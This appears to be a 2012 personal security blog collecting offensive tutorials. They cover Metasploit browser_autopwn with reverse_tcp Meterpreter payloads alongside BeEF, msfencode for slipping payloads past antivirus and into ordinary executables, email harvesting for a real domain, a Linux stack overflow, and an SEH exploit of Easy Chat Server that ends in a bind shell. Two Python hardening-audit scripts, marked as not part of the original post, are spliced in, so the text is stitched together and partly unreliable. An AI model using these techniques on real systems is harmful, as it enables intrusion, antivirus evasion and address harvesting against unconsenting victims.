Monday, 27 February 2012

Example: using BeEF with Metasploit

In this session I will explain how to use BeEF. Before practising with the BeEF-NG application, open it on BackTrack via Exploitation Tools > Social Engineering Tools > BeEF XSS Exploitation.

Copy the ui/panel path, paste it into the web browser, and fill in the BeEF username and password.

Open a terminal and run Metasploit:
root@bt:~# msfconsole


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 47 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 47 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306



Type "search browser" to find auxiliary modules:
msf > search browser

Matching Modules
================

   Name                                                                   Disclosure Date  Rank       Description
   ----                                                                   ---------------  ----       -----------
   auxiliary/dos/windows/browser/ms09_065_eot_integer                     2009-11-10       normal     Microsoft Windows EOT Font Table Directory Integer Overflow
   auxiliary/dos/windows/smb/ms11_019_electbowser                                          manual     Microsoft Windows Browser Pool DoS
   auxiliary/gather/android_htmlfileprovider                                               normal     Android Content Provider File Disclosure
   auxiliary/scanner/http/lucky_punch                                                      normal     HTTP Microsoft SQL Injection Table XSS Infection
   auxiliary/server/browser_autopwn                                                        normal     HTTP Client Automatic Exploiter

Use "auxiliary/server/browser_autopwn" and type "show options" to see the module options:
msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Set LHOST and check the result in the module options:
msf  auxiliary(browser_autopwn) > set LHOST 192.168.56.1
LHOST => 192.168.56.1

Set PAYLOAD_WIN32 and PAYLOAD_JAVA, then type exploit to see the result:
msf  auxiliary(browser_autopwn) > set PAYLOAD_WIN32
PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
msf  auxiliary(browser_autopwn) > set PAYLOAD_JAVA
PAYLOAD_JAVA => java/meterpreter/reverse_tcp
msf  auxiliary(browser_autopwn) > exploit 
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2012-03-01 00:38:25 +0700
msf  auxiliary(browser_autopwn) > [*] Done in 4.42241719 seconds

In the exploitation output, note the "Local IP" URL; it is the one used for the exploitation with BeEF:
[*] Using URL: http://0.0.0.0:8080/NWUmoPCg
[*]  Local IP: http://192.168.182.3:8080/NWUmoPCg
[*] Server started. 

Open BeEF-NG in the browser again, click Command > Network > JBoss, fill in the blanks as shown below, and click Execute.


Now look at the victim's computer: the victim's browser has crashed.

Open the terminal again and type "sessions -l".

Finally, type "sessions -i 1" and the Meterpreter session appears.

msfencode and msfpayload definitions (update)

- Msfencode is another tool included in the Metasploit Framework and is used to encode an exploit or payload. In many cases basic exploits can be detected by virus scanners, but by encoding them we have a better chance of bypassing their detection routines and ensuring that our payload gets executed on the target system. In addition, recent updates to msfencode also allow us to encode a payload into an existing executable. This means you can take a normal application, encode it with our payload, and end up with an encoded copy of the executable that contains the payload and is ready to run on the target system. This goes very well with the custom-malware concept we have talked about, where an actual usable program is sent to the target but our malware is sent along with it.
To use msfencode, open a terminal and type:
- #msfencode -l

Change directory to msf3. One of the easiest ways to use msfencode is to pipe the output of msfpayload directly into it. After you decide which encoding method to use, you choose the format you want the result in, similar to msfpayload. For example, we will use the x86/shikata_ga_nai encoder and output to another executable. The result is:


- msfpayload is a component of Metasploit that allows you to generate shellcode, executables, and much more for use in exploits outside of the framework. Shellcode can be generated in many formats including C, Ruby, JavaScript, and even Visual Basic for Applications. Each output format is useful in different situations.

To use msfpayload, open a terminal and type:
- #msfpayload -l

Type the script below to start listening and to determine the payload:

SE and SET definitions

SE (Social Engineering) is a trick used by a hacker/cracker to fool the victim into doing something.
SET (Social Engineering Toolkit) is specifically designed to perform advanced attacks against the human element. Originally this tool was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy with a lot of help from the community in incorporating attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.

Using Metasploit auxiliary modules (update)

Open the terminal and type msfconsole.
Type the command below to use the email collector we added before:


We type "show auxiliary" to see the auxiliary modules.

We use "auxiliary/gather/search_email_collector" and type "show options" to see the parameters we can use:
msf > use gather/search_email_collector
msf  auxiliary(search_email_collector) > show options 

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

We set DOMAIN to search for email addresses at y**oo.

There are the email addresses for the specified domain. This is only one example of a Metasploit auxiliary module.

Friday, 24 February 2012

Linux Exploitation

Before exploiting Linux we must turn off ASLR with the following steps.

Type the script below:

Run the application with gdb.

Overwrite EIP by sending fuzzing data.

Type the following for more information on the EIP register.

Type the following to see the application's stack entrance, and look at the ESP register.


Run sc_generator to find the shellcode.

Insert the shellcode into the fuzzer and exploit Linux as shown below.
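As an added defensive check (not part of the original post), the Python below audits the protections this Linux walk-through depends on being absent: it parses an ELF64 image for PIE (without which ASLR cannot move the code), a non-executable stack and RELRO, and interprets the randomize_va_space sysctl the post turns off. The sample ELF is constructed in the code rather than read from disk.

```python
"""Audit an ELF64 binary for PIE, NX stack and RELRO, and read the ASLR sysctl.
Added example, not from the original post; offsets follow the ELF64 specification."""
import struct

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, ET_EXEC, ET_DYN = 0x1, 2, 3


def audit_elf(data: bytes) -> dict:
    """Return hardening flags parsed from a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    # e_type at 0x10, e_phoff at 0x20, e_phentsize/e_phnum at 0x36/0x38
    e_type = struct.unpack_from("<H", data, 0x10)[0]
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    nx, relro = False, False  # a missing PT_GNU_STACK header means an executable stack
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)   # stack segment without PF_X: shellcode on it cannot run
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_elf(e_type: int, stack_flags: int, with_relro: bool) -> bytes:
    """Construct a minimal (headers-only) ELF64 image so the audit can run offline."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0x4))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8      # 64-bit, LE, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0,
                               64, 56, len(phdrs), 64, 0, 0)    # x86-64, phdrs follow the header
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    return ehdr + body


def aslr_enabled(sysctl_value: str) -> bool:
    """Interpret /proc/sys/kernel/randomize_va_space; 0 is the value the post sets."""
    return int(sysctl_value.strip()) >= 1


if __name__ == "__main__":
    print("hardened:", audit_elf(build_elf(ET_DYN, 0x6, True)))
    print("legacy  :", audit_elf(build_elf(ET_EXEC, 0x7, False)))
    print("aslr on :", aslr_enabled("2\n"), "aslr off:", aslr_enabled("0\n"))
```

On a real system, pass `open(path, "rb").read()` to `audit_elf` and the contents of /proc/sys/kernel/randomize_va_space to `aslr_enabled`; a binary that reports all three flags false on a host with the sysctl at 0 is in exactly the state the walk-through above prepares.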

Wednesday, 22 February 2012

Buffer overflow in Easy Chat Server: "SEH and SafeSEH"

First I want to search for a vulnerability in Easy Chat Server. I chose Wireshark to sniff the packet data of Easy Chat Server. Before using Wireshark, I used Easy Chat Server from a web browser and registered an account.

I log in to Easy Chat Server and choose a friend to chat with me.

Run Wireshark to sniff the packet data of Easy Chat Server. I see the packet data for Easy Chat Server at IP 192.168.56.101.

I type the source for the fuzzer based on what Wireshark shows. I build the fuzzer as below:

Run Easy Chat Server, then OllyDbg; click View > Attach, search for Easy Chat Server and click Attach.

The application crashes, but EIP is not overwritten by the buffer we sent, because this application uses SEH. To view the SEH chain, choose View > SEH chain.

Now the EIP value becomes 41414141.

To view the data inside the application's memory, right-click stack line 3 > Follow in Dump. The buffer data is then visible in the memory window on the left.

Copy the file ssleay32.dll to the BackTrack system to check whether this file is suitable for SEH.

Open a terminal and enter the Metasploit directory. Type ./msfpescan -p /tmp/ssleay32.dll. Try the module ssleay32.dll in the SEH chain.

Double-click SSLEAY32.dll, right-click > Search for > Sequence of commands. When the search window appears, type POP r32, POP r32, RETN and click Find.

Now OllyDbg has found the memory address in SSLEAY32.dll.

Open a terminal and find ./pattern_create.rb.

Copy the pattern_create.rb output into the script and run the script again. Easy Chat Server crashes; note the value in EIP.

Open a terminal and run pattern_offset with the value contained in EIP.

Type the script below:

The script executed successfully; the buffer value \x41 entered the SEH handler.

Type the script below to enter the address found by msfpescan in SSLEAY32.dll.

See that OllyDbg breaks the process exactly when it is about to access the SSLEAY32.dll address. Look at the SEH chain.

Press Shift+F9 to continue the process into SSLEAY32.dll memory.

Open a web browser and type localhost with port 5555. Now in Metasploit, choose payload search os::win32, then choose Windows bind shell.

I know this payload contains bad characters, so I rebuild the payload, removing the bad characters "\x20\x25\x0a\x0d\x08\x80\x32\x6e\x3f".

Copy the payload into the fuzzer script.

Run the script.

See the result: Easy Chat Server crashes.

Access telnet from the terminal. Now the exploit is successful.
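As an added defensive check (not part of the original post), the Python below reads a PE module's DllCharacteristics to report whether it opts into ASLR (DYNAMIC_BASE), DEP (NX_COMPAT) and the NO_SEH declaration; a DLL that, like the ssleay32.dll above, reports none of them is the kind of module the POP/POP/RETN step relies on, so the defensive use is auditing every DLL an application ships. SafeSEH itself is recorded in the load configuration directory, which this header-only check does not walk; the sample PE is constructed in the code rather than read from disk.

```python
"""Audit a PE32/PE32+ module's DllCharacteristics for ASLR, DEP and NO_SEH opt-ins.
Added example, not from the original post; offsets follow the PE/COFF specification."""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # image may be relocated (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # image is DEP compatible
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400         # image declares it uses no SEH


def audit_pe(data: bytes) -> dict:
    """Return the ASLR/DEP/NO_SEH opt-ins parsed from a PE image's optional header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at +0x46 in both the PE32 and the PE32+ optional header
    dll_chars = struct.unpack_from("<H", data, opt + 0x46)[0]
    return {
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
    }


def build_pe(dll_chars: int) -> bytes:
    """Construct a minimal PE32 header image (no sections) carrying the given flags."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)  # i386, 0xE0-byte opt hdr, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<H", opt, 0x46, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print("hardened DLL:", audit_pe(build_pe(0x0140)))
    print("legacy DLL  :", audit_pe(build_pe(0x0000)))
```

For a real module, pass `open(path, "rb").read()` to `audit_pe`; a result of all three flags false marks a DLL to rebuild with /DYNAMICBASE and /NXCOMPAT or to drop from the application's load set.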